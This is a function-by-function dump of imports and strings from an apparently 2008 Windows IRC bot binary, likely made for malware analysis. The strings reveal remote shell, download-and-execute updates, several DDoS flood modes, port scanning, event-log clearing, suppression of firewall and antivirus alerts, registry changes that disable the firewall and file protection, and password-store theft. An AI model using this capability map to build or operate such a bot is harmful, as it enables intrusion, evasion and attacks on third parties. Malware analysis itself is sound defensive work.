sub_428FED(552e):
".\\"
|
sub_427027(5645):
KERNEL32.GetModuleHandleA
|
sub_410269(56d2):
KERNEL32.lstrcpyA
"'TF"
"=Z]"
"=RA"
"=TA"
"%s %s\r\n"
|
sub_41066C(5834):
KERNEL32.Sleep
"%s %s : %s\r\n"
|
sub_4105DF(5834):
KERNEL32.Sleep
"%s %s : %s\r\n"
|
sub_418AA2(5868):
KERNEL32.Sleep
|
sub_428038(58ed):
KERNEL32.VirtualAlloc
|
sub_419EE6(5a2e):
"."
|
sub_41AA69(5a85):
"SOFTWARE\\Microsoft\\Security Center"
"HKLM"
"HKCU"
"g4XSw0jA5mx."
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s Set \"%s\\%s\\%s\" to \"%d\"."
"HKLM"
"HKCU"
"g4XSw0jA5mx."
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s Failed to set \"%s\\%s\\%s\" to \"%d\"."
"SOFTWARE\\Microsoft\\Security Center"
"HKLM"
"HKCU"
"g4XSw0jA5mx."
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s Set \"%s\\%s\\%s\" to \"%s\"."
"HKLM"
"HKCU"
"g4XSw0jA5mx."
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s Failed to set \"%s\\%s\\%s\" to \"%s\"."
"Secured"
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s Failed to %s Registry, (%.2d/%.2d)"
"g4XSw0jA5mx."
"Secure"
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s Registry %s, (%.2d/%.2d)"
"g4XSw0jA5mx."
|
sub_41074B(5a97):
"=Z]"
"%s %s\r\n"
|
sub_401C99(5b15):
KERNEL32.FreeLibrary
|
sub_426F44(5bc4):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
|
sub_414349(5e53):
KERNEL32.lstrcmpA
KERNEL32.Sleep
"%s"
"%s"
|
sub_4033F0(5f8d):
KERNEL32.GetTickCount
WS2_32.send
WSOCK32.recv
WS2_32.closesocket
"8HJ"
"%s %s\n%s %s \"mail.gmail.com\" \"127.0.0.1"...
|
sub_4241D4(5fb6):
KERNEL32.GetLocalTime
KERNEL32.GetSystemTime
KERNEL32.GetTimeZoneInformation
|
sub_410491(60f7):
KERNEL32.Sleep
"%s %s :%s\r\n"
|
sub_42BC26(61dc):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
|
sub_41477A(62bd):
USER32.FindWindowA
KERNEL32.Sleep
USER32.SendMessageA
USER32.IsWindow
KERNEL32.ExitThread
"Windows Security Alert"
"BitDefender Firewall Alert"
|
sub_42E02D(6338):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_42794F(64eb):
KERNEL32.VirtualAlloc
|
sub_403B2C(66a7):
KERNEL32.lstrcmpiA
KERNEL32.Sleep
WS2_32.WSACleanup
KERNEL32.ExitProcess
KERNEL32.GetVersionExA
ADVAPI32.OpenEventLogA
ADVAPI32.ClearEventLogA
ADVAPI32.CloseEventLog
KERNEL32.lstrcpyA
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.GetTickCount
KERNEL32.GetModuleFileNameA
DNSAPI.DnsFlushResolverCache
KERNEL32.WaitForSingleObject
KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.GetFileSize
WS2_32.socket
WS2_32.ntohs
WS2_32.bind
WS2_32.getsockname
WS2_32.listen
WS2_32.gethostbyname
WS2_32.ntohl
WS2_32.select
WS2_32.closesocket
WS2_32.accept
KERNEL32.SetFilePointer
KERNEL32.ReadFile
WS2_32.send
WS2_32.recv
KERNEL32.GetTempPathA
WS2_32.inet_ntoa
WS2_32.WSAStartup
WS2_32.connect
"c7RQ4/xPvel."
"uc6Wg1OvWVt1"
"Ob4iQ/KJ5ue."
"Thread List"
"h1cMQ0wQw5C."
"g3obv.r6j7H/"
"Sniffer"
"HyOMe/iovtV."
"Procs"
"qbwGd0CFxf./"
"2mo7G0.B0qj/"
"9bWj..lZ2My0"
"WyF3K1fTHKz."
"Drive list"
"7Tmte.MEccn/"
"wN7.t/nZA2V/"
"gkYv90Skypy/"
"X2yN5/.2ImZ1"
"N/pbW1sDKiw."
"fDxPB0lEh21."
"vB1r0/N.Arr0"
"uts3o.RfmkS."
"bPYVP.Fw0vY1"
"QXqOg1gOYq80"
"uFbSS0Cbo8C."
"Download"
"NoaZx1Alvg/0"
"Update"
"sUd8h/rsu8j1"
"j2yYw.J09XC/"
"rioCl1kzTWO0"
"Stopped."
"Secure"
"c7RQ4/xPvel."
"h/08./drzWX."
"[%s] ~"
".HiOo.5pwEU."
"h/08./drzWX."
"%s (Cipher text): \""
"\\x%2.2X"
"\";"
"dJ9OW/uMRBD."
" (SSL)"
"h/08./drzWX."
"%s: [Current Server]: [%i:%s:%d%s]"
"PlsYM/aEe6v1"
"h/08./drzWX."
"%s [Server List]:"
" (SSL)"
"[%i: %s:%d%s,%s]"
"%s Servers Listed"
"l3nYW.D7Tfl."
"h/08./drzWX."
"%s [Alias list]"
"%d. %s = %s"
"P00Ls0K4t.N1"
"%s"
" %s"
"h/08./drzWX."
"%s Added Alias: %s"
"h/08./drzWX."
"%s Missing param(s)"
"%c%s"
"$me"
"$user"
"$chan"
"$1"
"$2"
"$3"
"$4"
"$5"
"$6"
"PDazX1oDSOh0"
"uc6Wg1OvWVt1"
"*"
"Remove cmd received: [%s!%s@root]"
"Vsz2x/xqJP5/"
"application"
"security"
"h/08./drzWX."
"%s Cleared [%d/%d] syslogs"
"%s Failed to clear syslogs"
"h/08./drzWX."
"%s Advapi.dll not loaded"
"Ob4iQ/KJ5ue."
"e0idD0RDw2U/"
"86tb/1FSpjg0"
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s Stopped: [%d] thread(s)"
"%s No thread(s) found"
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s Killed thread: [%s]"
"%s Killed thread: [%s]"
"%s Failed to kill thread: [%s]"
"%s Failed to kill thread: [%s]"
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s %s Already running at thread number:"...
"Thread list"
"NFKNL0nQigY0"
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s Thread list"
"%s Failed to start [%s], error: [%d]"
"Thread list"
"Thread list"
"g3obv.r6j7H/"
"d/Jst/MFgyQ."
"%s %s Already running at thread number:"...
"m7P/c1xaudB1TY84s/myQpz0"
"Sniffer."
"Sniffer."
"m7P/c1xaudB1TY84s/myQpz0"
"%s Sniffer."
"%s started."
"g3obv.r6j7H/"
"eRWc30Qfw.P0"
"Sniffer"
"M5sPX.Qp7Lx."
"%s %s Already running at thread number:"...
"iaZcN0Rz/rw0xfK1r.VuQwI."
"PStore"
"*"
"iaZcN0Rz/rw0xfK1r.VuQwI."
"%s PStore"
"%s Failed to start [%s], error: [%d]"
"PStore"
"PStore"
"PStore"
"PStore"
"f9aX112067l1"
"%s"
" %s"
"%s"
" %s"
"1YLId.eJQP01"
"II/290Eb6G4/TY84s/myQpz0"
"%s Patcher thread."
"%s Failed to start [%s], error: [%d]"
"68gmp/wceS//Mnsrm1FhS.k."
"Patcher"
"Patcher"
"68gmp/wceS//Mnsrm1FhS.k."
"%s Patcher Started"
"rioCl1kzTWO0"
"%s %s Already running at thread number:"...
"8nIOw/w5nRT1"
"8nIOw/w5nRT1"
"%s Running on: [%s:%i]"
"%s Failed to start [%s], error: [%d]"
"%s Running on: [%s:%i]"
"%s Running on: [%s:%i]"
".SWwg1hqeiI1"
"s3dY//JZo6r/"
". Built: Jun 10 2008."
"h/08./drzWX."
"%s %s (%s) %s"
". Built: Jun 10 2008."
"h/08./drzWX."
"%s %s (%s) %s"
"pNb.a/Bfzu60"
"h/08./drzWX."
"%s UPTime: (%s)"
"%s"
"qbwGd0CFxf./"
"2mo7G0.B0qj/"
"47Ff/020f.0."
"II/290Eb6G4/TY84s/myQpz0"
"%s BKill Started"
"%s Failed to start [%s], error: [%d]"
"BKill"
"BKill"
"HyOMe/iovtV."
"%s Missing param(s)"
"II/290Eb6G4/TY84s/myQpz0"
"Procs"
"II/290Eb6G4/TY84s/myQpz0"
"%s %s Already running at thread number:"...
"CwXYh0RYoUv1"
"II/290Eb6G4/TY84s/myQpz0"
"eAvYh.IC0dc0"
"%s Missing param(s)"
"II/290Eb6G4/TY84s/myQpz0"
"II/290Eb6G4/TY84s/myQpz0"
"%s Procs"
"uz3rf.VTKug1"
"II/290Eb6G4/TY84s/myQpz0"
"II/290Eb6G4/TY84s/myQpz0"
"%s Create process thread."
"%s Failed to start [%s], error: [%d]"
"Procs"
"Procs"
"I3nCG.v5U4g."
"9bWj..lZ2My0"
"PnmNw.7RScG0"
"%s EFTPD running on port: %i, thread nu"...
"%s EFTPD running on port: %i, thread nu"...
"PnmNw.7RScG0"
"%s Server started on Port: %i, File: %s"...
"%s Failed to start [%s], error: [%d]"
"II/290Eb6G4/TY84s/myQpz0"
"EFTPD"
"EFTPD"
"%s EFTPD enabled on port: %i, thread nu"...
"%s EFTPD enabled on port: %i, thread nu"...
"ajTtz06Ztse1"
"uN3hk0sn58o/"
"QRn4z10ge1I1"
"bVUSO0ed3MW/"
"%s Missing param(s)"
"yUoHi/GMFZv/"
"%s"
" %s"
"yUoHi/GMFZv/"
"%s Sent IRC raw: \"%s\"."
"Qc9zS1zGZff0"
"h/08./drzWX."
"%s ARP flushed."
"%s Failed to flush ARP."
"WpuWr.6YFRU/"
"h/08./drzWX."
"%s DNS cache flushed."
"%s Failed to flush DNS cache."
"h/08./drzWX."
"%s Failed to load dnsapi.dll."
"4RmBz/FCic21"
"SC.Co/swLK/."
"qnQb5/bavH1.Mnsrm1FhS.k."
"%s Obtaining external IP"
"qnQb5/bavH1.Mnsrm1FhS.k."
"%s Obtaining external IP"
"sAsD20NmhK50"
"KxOR8.oS17a0"
"WyF3K1fTHKz."
"%s %s Already running at thread number:"...
"iVRum..LtyN0X9DHH1k06Rd1"
"Drives List"
"Drives List"
"KxOR8.oS17a0"
"sAsD20NmhK50"
"cwXsH.xFlvu."
"KB"
"MB"
"GB"
"iVRum..LtyN0X9DHH1k06Rd1"
"%s Drives"
"%s Failed to start [%s], error: [%d]"
"Drives"
"Drives"
"HPmCH0PbQ800"
"%s Missing param(s)"
"X1PIk/rO.TL."
"X1PIk/rO.TL."
"%s"
"X1PIk/rO.TL."
"%s No file"
"X1PIk/rO.TL."
"%s Invalid Socket"
"X1PIk/rO.TL."
"%s Socket Bind Error"
"X1PIk/rO.TL."
"%s Socket Error"
"Sending you %s"
"DCC Send %s (%s)"
"%s %d %d %i"
"X1PIk/rO.TL."
"%s Timed Out, closing connection."
"X1PIk/rO.TL."
"%s Connection closed: (%i/%ikB sent)."
"LeEs11vPbnf0"
"lbJVg0r.qMb."
"ZRbAx.zPSBs.TY84s/myQpz0"
"%s Too Much conns."
"ZRbAx.zPSBs.TY84s/myQpz0"
"%s Loaded Onto: (%s:%d), Amount: (%d)"
"ZRbAx.zPSBs.TY84s/myQpz0"
"%s Loaded Onto: (%s:%d), Amount: (%d)"
"Hj6vo0JRP9Q0"
"%s"
" %s"
"r7WRs/qHek.0"
"DuzCb0KgSsv0"
"%s"
" %s"
"dQJSO.47pdb/"
"K9V/U/KkuTM/"
"%s"
" %s"
"7yfnz0PW11s1"
"%s"
" %s"
"nQ.As1Z1SIt/"
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"'TF"
"%s Missing param(s)"
"ZRbAx.zPSBs.TY84s/myQpz0"
"ZRbAx.zPSBs.TY84s/myQpz0"
"'TF"
"%s %s"
"QRn4z10ge1I1"
"=Z]"
"%s %s"
"iEguD0V/.5/."
"XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
"=Z]"
"fc9Kk1jX11G."
"%s %s"
"DnjQ8/ze3ZW/"
"'TF"
"%s %s"
"XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
"=Z]"
"'TF"
"%s %s"
"XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
"=Z]"
"'TF"
"%s %s"
"XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
"=Z]"
"VI0QA1mvfro1"
"%s %s :DCC SEND C:\\\\\\\\%s"
"jdZDp05E7aW."
"a a a a a a a a a a a a a a a a a a a a"...
"W3GP6.13AcY1"
"'TF"
"%s %s"
"%s %s"
"%s %s"
"%s %s"
"zAT3J.lm3Ge1"
"%s %s"
"lJ/am/kZRtP1"
"'TF"
"%s %s"
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"XZArU0aMxhi."
"'TF"
"%s %s"
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"rA7E2/hHXPf0"
"'TF"
"%s %s"
"Rp4sR11CvR1/"
"'TF"
"%s %s"
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
"ZqrVt0t6nmZ."
"%s"
" %s"
"%s memoserv :send %s %s"
"1ShtA0bzFwk1"
"%s@%s.com"
"%s nickserv :register pass103 %s"
"AZcsP.hkiLO."
"eRWc30Qfw.P0"
"%s Unloaded."
"ZRbAx.zPSBs.TY84s/myQpz0"
"FEpMF/ZswFD/"
"h/08./drzWX."
"h/08./drzWX."
"%s SystemCall failed."
"h/08./drzWX."
"%s SystemCall sent: \"%s\""
"sUd8h/rsu8j1"
"%s Remote shell running."
"ckdai0Gd9lr."
"ckdai0Gd9lr."
"%s Couldn't open shell."
"%s Shell ready."
"%s Shell ready."
"j2yYw.J09XC/"
"%s Missing param(s)"
"%s"
" %s"
"\n"
"ckdai0Gd9lr."
"%s Error sending to shell."
"%s Commands: %s."
"43uCS0rkQUx."
"uFbSS0Cbo8C."
"%s %s Already running at thread number:"...
"OPC9A1upRd41IwhIm0ocHBf0"
"Download"
"OPC9A1upRd41IwhIm0ocHBf0"
"%s Downloading to: %s."
"%s Failed to start [%s], error: [%d]"
"Download"
"Download"
"%s Download"
"%s Missing param(s)"
"OPC9A1upRd41IwhIm0ocHBf0"
"NoaZx1Alvg/0"
"%s Missing param(s)"
"SmO3C0MCu8j.xfK1r.VuQwI."
"%s %s Already running at thread number:"...
"SmO3C0MCu8j.xfK1r.VuQwI."
"Update"
"%smsoft%d%d%d%d%d.exe"
"SmO3C0MCu8j.xfK1r.VuQwI."
"%s Downloading update to: (%s)"
"%s Failed to start [%s], error: [%d]"
"Update"
"Update"
"%s Downloading update"
"l80re/UvCUe1"
"TVJrO1uBGtg1"
"VXA.u/cDD7S0"
"Stopped."
"h1cMQ0wQw5C."
"RA/Mr15qAbm1"
"%s Invalid port"
"x.x.x.x"
"%d.x.x.x"
"RA/Mr15qAbm1"
"%s No IP specified."
"RA/Mr15qAbm1"
"%s No subnet class specified."
"Random"
"Sequential"
"RA/Mr15qAbm1"
"%s %s PortScan started on %s:%d with a "...
"%s Failed to start scan thread, error: "...
"%s Failed to start scan thread, error: "...
"Random"
"Sequential"
"Random"
"Sequential"
"7Tmte.MEccn/"
"wN7.t/nZA2V/"
"gkYv90Skypy/"
"X2yN5/.2ImZ1"
"N/pbW1sDKiw."
"fDxPB0lEh21."
"vB1r0/N.Arr0"
"uts3o.RfmkS."
"bPYVP.Fw0vY1"
"QXqOg1gOYq80"
"ZjIqO/07c2/0"
"eAvYh.IC0dc0"
"%s"
" %s"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Failed to erase key: %s\\%s\\%s"
"%s Failed to erase key: %s\\%s\\%s"
"a4pll/aQpBg."
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Done with query: %s\\%s"
"%s Failed to query: %s\\%s"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Query: %s\\%s\\%s: %d"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Failed to query: %s\\%s\\%s"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Displaying: %s\\%s\\%s"
"%s Displaying: %s\\%s\\%s"
"\n"
"\n"
"%s"
"%s Finished displaying: %s\\%s\\%s"
"%s Finished displaying: %s\\%s\\%s"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Query: %s\\%s\\%s: %s"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Failed to query: %s\\%s\\%s"
"NN0i61uJg7H1"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Successfully wrote: %s\\%s\\%s (%d)"
"%s Successfully wrote: %s\\%s\\%s (%d)"
"%s Failed to write: %s\\%s\\%s (%d)"
"%s Failed to write: %s\\%s\\%s (%d)"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Failed to write: %s\\%s\\%s (%s)"
"%s Failed to write: %s\\%s\\%s (%s)"
"%s Missing param(s)"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s Missing param(s)"
"tOVrF/YuzFI1Mnsrm1FhS.k."
"iKgEK/kyKJQ1"
"6x7zf1EztnY."
"7otcU0FiC6V0"
"mb05g/VYf8f1"
"FyFlU0jI3XH."
"SbsIp.o7V4B/"
"Tcp"
"UyfOG.DvVnY0"
"i7LwU1UbY8A0"
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s Failed to start thread, error: (%d)."...
"pSern1AAGh6."
"i7LwU1UbY8A0"
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"XkG84.cESgs."
"i7LwU1UbY8A0"
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"p06vq/BFBMo."
"%s %s Already running at thread number:"...
"i7LwU1UbY8A0"
"KDOS Threads"
"KDOS Threads"
"i7LwU1UbY8A0"
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s Failed to start thread, error: (%d)"
"%s Failed to start thread, error: (%d)"
"%s Missing param(s)"
"i7LwU1UbY8A0"
"3VVsV1VuRUA/"
"KDOS"
"2ONVG1WFjmb1"
"%s %s Already running at thread number:"...
"2FUlS/VPAyI0"
"IGMP Threads"
"IGMP Threads"
"2FUlS/VPAyI0"
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s --> (%s:%d) for (%d secs)."
"%s Missing param(s)"
"2FUlS/VPAyI0"
"ZqhIJ/ZaEZa."
"IGMP"
"Zk1Tr0lpP5R0"
"%s %s Already running at thread number:"...
"XtyrE1.RJaR.xfK1r.VuQwI."
"XtyrE1.RJaR.xfK1r.VuQwI."
"%s --> (%s:%d) for %d sec's"
"%s --> (%s:%d) for %d sec's"
"%s --> (%s) for %d sec's"
"%s Missing param(s)"
"XtyrE1.RJaR.xfK1r.VuQwI."
"6ldRA/K4kDS/"
"TaiPan"
"X.62C.3LDCP/"
"%s %s Already running at thread number:"...
"ZsHqZ13bZ2w1"
"Targa Threads"
"Targa Threads"
"ZsHqZ13bZ2w1"
"%s --> (%s:%d) for %d sec's with %d del"...
"%s --> (%s:%d) for %d sec's with %d del"...
"%s --> (%s:%d) for %d sec's with %d del"...
"%s Missing param(s)"
"ZsHqZ13bZ2w1"
"wt4Rn/WGL6V."
"Targa"
"Em42x.1IsZI1"
"%s %s Already running at thread number:"...
"JJc1c1nn0bL0TY84s/myQpz0"
"HTTPF Threads"
"HTTPF Threads"
"JJc1c1nn0bL0TY84s/myQpz0"
"%s No delay."
"%s --> (%s:%d) %d packets."
"%s --> (%s:%d) %d packets."
"%s --> (%s:%d) %d packets."
"%s Missing param(s)"
"JJc1c1nn0bL0TY84s/myQpz0"
"ERNNi/HM17T1QRn4z10ge1I1"
"HTTPF"
"n3sAa1exPWU1"
"%s %s Already running at thread number:"...
"75bQQ0i7ucW0"
"UDP Threads"
"UDP Threads"
"75bQQ0i7ucW0"
"%s %s"
"%s Failed to start thread,error: <%d>."
"%s Failed to start thread,error: <%d>."
"%s Sending %d to: %s, Packet size: %d, "...
"%s Missing param(s)"
"75bQQ0i7ucW0"
"/BURN/P75Wk/"
"Xxulc08O9rf0"
"KmdIe1UwntQ/"
"CWje81ZpYQ1.TY84s/myQpz0"
"%s Missing param(s)"
"%s %s Already running at thread number:"...
"CWje81ZpYQ1.TY84s/myQpz0"
"VisitThreads"
"Visit Threads"
"CWje81ZpYQ1.TY84s/myQpz0"
"%s --> (%s)."
"%s --> (%s)."
"%s --> (%s)."
"UPx0W/cz2EI0QRn4z10ge1I1"
"Visit"
"V6jBH0k4u/d."
"iexplore"
"open"
"CWje81ZpYQ1.TY84s/myQpz0"
"%s Site opened."
"%s Site failed to open."
"%s Site failed to open."
"B2smo.WHkeW.QRn4z10ge1I1"
"iexplore.exe"
"%s Stopped."
"X4Cty1aEQwX/"
"%s Socket Error."
"CWje81ZpYQ1.TY84s/myQpz0"
"%s %s HTTP/1.1\r\nReferer: %s\r\nUser-Agent"...
"CWje81ZpYQ1.TY84s/myQpz0"
"%s Socket Error."
"\n"
"%s"
"%s Missing param(s)"
"CWje81ZpYQ1.TY84s/myQpz0"
"%s %s Already running at thread number:"...
"8sXNG.tDfrt/"
"Tcp Threads"
"Tcp Threads"
"Spoofed"
"Normal"
"8sXNG.tDfrt/"
"%s Failed to start flood thread, error:"...
"%s Failed to start flood thread, error:"...
"%s Missing param(s)"
"8sXNG.tDfrt/"
"wN7.t/nZA2V/"
"gkYv90Skypy/"
"X2yN5/.2ImZ1"
"N/pbW1sDKiw."
"fDxPB0lEh21."
"vB1r0/N.Arr0"
"uts3o.RfmkS."
"bPYVP.Fw0vY1"
"QXqOg1gOYq80"
"RA/Mr15qAbm1"
"x.x.x.x"
"%d.x.x.x"
"Random"
"Sequential"
"%s %s PortScan started on %s:%d with a "...
"%s Failed to start scan thread, error: "...
"%s Failed to start scan thread, error: "...
"Random"
"Sequential"
"%s %s PortScan started on %s:%d with a "...
"Random"
"Sequential"
"%s %s PortScan started on %s:%d with a "...
"%s No IP specified"
"%s No subnet class specified"
"RA/Mr15qAbm1"
"%s Missing param(s)"
"qbwGd0CFxf./"
"%s %s Already running at thread number:"...
"g4XSw0jA5mx."
"g4XSw0jA5mx."
"Secure"
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s %s."
"g4XSw0jA5mx."
"%s Failed to start [%s], error: [%d]"
"Secure"
"wXBrG.Rpy8y.TY84s/myQpz0"
"Secure"
"g4XSw0jA5mx."
"g4XSw0jA5mx."
"wXBrG.Rpy8y.TY84s/myQpz0"
|
sub_414508(6714):
KERNEL32.SearchPathA
KERNEL32.CreatePipe
KERNEL32.GetCurrentProcess
KERNEL32.DuplicateHandle
KERNEL32.CreateProcessA
KERNEL32.CloseHandle
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
"cmd.exe"
"ckdai0Gd9lr."
"%s CMD Prompt"
"%s Failed to start IO thread, error: <%"...
|
sub_42A95E(676a):
KERNEL32.GetOEMCP
KERNEL32.GetCPInfo
|
sub_41F455(681c):
KERNEL32.CreateThread
KERNEL32.Sleep
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.DeleteService
KERNEL32.GetWindowsDirectoryA
KERNEL32.lstrcatA
KERNEL32.WritePrivateProfileStringA
KERNEL32.ReleaseMutex
"\\system.ini"
"explorer.exe"
"shell"
"boot"
|
sub_410DDF(68dc):
KERNEL32.GetTickCount
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM"...
"|%d|%s%c%c%c%c%c%c%c%c%c"
"%s%c%c%c%c%c%c%c%c%c"
|
sub_41012A(69b2):
WS2_32.shutdown
WS2_32.closesocket
"leaving.."
|
sub_41F630(6bae):
IPHLPAPI.GetIpNetTable
IPHLPAPI.DeleteIpNetEntry
|
sub_41BF58(6bb8):
KERNEL32.TerminateThread
WS2_32.closesocket
|
sub_4206E2(6bb8):
WSOCK32.recv
|
sub_41B226(6bd9):
KERNEL32.Sleep
KERNEL32.ExitThread
WS2_32.WSACleanup
KERNEL32.ExitProcess
ADVAPI32.SetServiceStatus
NTDLL.RtlGetLastWin32Error
"System shutting down."
|
sub_42BF07(72a2):
KERNEL32.FlushFileBuffers
NTDLL.RtlGetLastWin32Error
|
sub_41099D(7371):
KERNEL32.GetVersionExA
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2K3"
"Vista"
|
sub_40FEC8(756f):
"h/08./drzWX."
"%s Login List:"
"<%i> %s!%s@%s"
"<%i> "
"h/08./drzWX."
"%s Login List complete."
|
sub_42042B(76f6):
WININET.InternetCrackUrlA
WININET.InternetConnectA
WININET.HttpOpenRequestA
WININET.HttpSendRequestA
WININET.InternetCloseHandle
KERNEL32.ExitThread
"*/*"
"CWje81ZpYQ1.TY84s/myQpz0"
"%s URL visited."
"%s Failed to get requested URL from HTT"...
"CWje81ZpYQ1.TY84s/myQpz0"
"%s Invalid URL."
"CWje81ZpYQ1.TY84s/myQpz0"
"%s Could not open a connection."
"CWje81ZpYQ1.TY84s/myQpz0"
"%s Failed to connect to HTTP server."
"%s"
|
sub_410BF1(77cb):
KERNEL32.GetLocaleInfoA
"|"
"%i"
"|"
|
sub_41C090(783f):
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s %s (%d thread(s) stopped)."
"%s No %s thread found."
|
sub_41F167(78f9):
KERNEL32.lstrcatA
KERNEL32.lstrcpyA
|
sub_4142E1(7918):
KERNEL32.CloseHandle
|
sub_4101D2(7a24):
WSOCK32.recv
KERNEL32.GetTickCount
|
sub_40178D(7a56):
WS2_32.inet_addr
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.CreateThread
KERNEL32.Sleep
KERNEL32.ExitThread
"RA/Mr15qAbm1"
"%s (%s:%d), ScanThread: (%d), SubThread"...
|
sub_4188DB(7abb):
KERNEL32.OpenProcess
KERNEL32.TerminateProcess
KERNEL32.CloseHandle
|
sub_414F91(7b88):
"Software\\Microsoft\\Active Setup\\Install"...
|
sub_401E76(7bbf):
KERNEL32.UnmapViewOfFile
KERNEL32.CloseHandle
|
sub_403A63(7d13):
KERNEL32.lstrcpyA
|
sub_4106F9(7d4a):
"'TF"
"%s %s\r\n"
|
sub_40B63F(7d66):
WS2_32.socket
WS2_32.ntohs
WS2_32.inet_addr
KERNEL32.Sleep
WS2_32.connect
WS2_32.send
WSOCK32.recv
WS2_32.closesocket
"RA/Mr15qAbm1"
"%s %s -> %s (Ex: %d)"
|
sub_4140CF(7d7b):
WS2_32.inet_addr
WS2_32.gethostbyname
|
sub_41A292(7edd):
"HKEY_LOCAL_MACHINE"
"HKLM"
"HKEY_CURRENT_USER"
"HKCU"
"HKEY_CLASSES_ROOT"
"HKCR"
"HKEY_CURRENT_CONFIG"
"HKCC"
"HKEY_USERS"
|
sub_403A30(7ee7):
WS2_32.closesocket
|
sub_41A57A(8057):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegCloseKey
|
sub_4177A2(806d):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
"tOVrF/YuzFI1Mnsrm1FhS.k."
"%s %s."
|
sub_412267(80f8):
KERNEL32.CreateMutexA
KERNEL32.WaitForSingleObject
KERNEL32.ExitProcess
KERNEL32.SetFileAttributesA
KERNEL32.DeleteFileA
KERNEL32.Sleep
KERNEL32.GetTickCount
WS2_32.WSAStartup
KERNEL32.CreateThread
WS2_32.gethostname
WS2_32.gethostbyname
WS2_32.inet_ntoa
DNSAPI.DnsFlushResolverCache
WS2_32.WSACleanup
KERNEL32.ReleaseMutex
KERNEL32.ExitThread
"h/08./drzWX."
"%s Main thread"
"g4XSw0jA5mx."
"%s AutoSecure"
"r PRIVMSG $1 god damnit,hard bitchslaps"...
"slaps"
"r PRIVMSG $1 slaps for You!!"
"slap"
"ctc2"
"r MODE $chan +o $1"
"ops"
"r MODE $chan +v $1"
"voice"
"r MODE $chan +h $1"
"halfop"
"r MODE $chan +b $1"
"ban"
"5000"
"WaitToKillServiceT"
"SYSTEM\\CurrentControlSet\\Control"
"SYSTEM\\CurrentControlSet\\Services\\Tcpip"...
"MaxUserPort"
"TcpTimedWaitDelay"
"StrictTimeWaitSeqCheck"
"Tcp1323Opts"
"GlobalMaxTcpWindowSize"
"EnablePMTUDiscovery"
"EnablePMTUBHDetect"
"SackOpts"
"DefaultTTL"
"LargeBufferSize"
"AllowUserRawAccess"
"DisableRawSecurity"
"SYSTEM\\CurrentControlSet\\Services\\Afd\\P"...
"MaxConnectionsPer1_0Server"
"Software\\Microsoft\\Windows\\CurrentVersi"...
"MaxConnectionsPerServer"
"Software\\Microsoft\\Windows\\CurrentVersi"...
"SYSTEM\\CurrentControlSet\\Services\\Lanma"...
"SizReqBuf"
"SFCDisable"
"Software\\Policies\\Microsoft\\Windows NT\\"...
"SFCScan"
"Software\\Policies\\Microsoft\\Windows NT\\"...
"AutoShareServer"
"AutoShareWks"
"SYSTEM\\ControlSet001\\Services\\SharedAcc"...
"EnableFirewall"
"DoNotAllowExceptions"
"DisableNotifications"
"SYSTEM\\ControlSet001\\Services\\SharedAcc"...
"EnableFirewall"
